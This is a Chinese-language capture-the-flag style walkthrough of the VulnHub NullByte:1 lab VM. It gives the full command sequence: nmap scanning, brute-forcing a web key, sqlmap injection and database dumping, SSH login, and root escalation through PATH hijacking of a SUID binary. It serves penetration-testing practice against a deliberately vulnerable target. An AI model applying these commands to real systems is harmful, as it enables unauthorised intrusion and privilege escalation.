OSCP难度靶机之NullByte: 1
2022-10-30 20:32:0 Author: 安全孺子牛(查看原文) 阅读量:12 收藏

虚拟机下载地址:https://www.vulnhub.com/entry/nullbyte-1,126/虚拟机简介:访问/root/proof. txt目标:1个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放80、111、777、53793端口

2、渗透测试

2.1 WEB渗透

1.访问站点查看到图片

获取图片文件进行分析,发现一段提示内容

exiftool main.gif

2.访问提示页面

根据提示访问页面后,显示输入key内容

使用BP结合rockyou.txt字典进行爆破,发现key密码为:elite

3.SQLMap爆破

访问页面后提示输入用户名

随便输入内容会进行查询

使用sqlmap进行爆破测试,获取到数据库信息

sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs --batch

爆破数据内容

sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump-all --batch

需要把获取到的密码进行base64解密,再使用MD5进行解密,获取到密码为:omega

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d

2.2 主机渗透

1.通过SSH进行登录

ssh [email protected] -p 777

2.查找拥有SUID文件

发现procwatch存在suid权限

find / -perm -u=s -type f 2>/dev/null

3.分析文件

执行文件后根据输出信息,发现类似于调用系统PS命令

cd /var/www/backup/
./procwatch

4.环境变量提权

发现已经获取到root权限

echo "/bin/sh"  > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch

5.获取Flag

cd /root
proof.txt


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247488991&idx=1&sn=5e47b767debf101f21656070023c69ef&chksm=ea6dc7c7dd1a4ed16c092322ccada833abb7cd7487caeb60931ec1d4e5ceaec51e22d9b26a09#rd
如有侵权请联系:admin#unsafe.sh